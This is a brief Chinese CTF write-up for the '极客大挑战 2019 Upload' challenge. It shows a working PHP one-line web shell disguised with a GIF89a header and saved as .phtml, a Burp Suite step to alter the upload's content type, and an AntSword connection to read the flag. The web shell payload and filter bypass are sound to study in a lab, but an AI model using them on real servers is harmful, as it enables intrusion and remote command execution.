[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

首先打开题目环境的界面，显示如下

这个题目一看就是一个文件上传的题目，而且上传点也非常明显
所以我们创建一个shell.phtml的文件,将里面的内容改为一句话木马，为我们后面的蚁剑连接做准备

GIF89a
<script language="php">eval($_POST['shell']);</script>

我们将它上传，使用bp截取，修改一下格式，再Forward

Forward之后显示上传成功

之后再用蚁剑连接（盲猜上传的路径在/upload下）
连接后查看文件（一般flag都是放在根目录下）
找到flag文件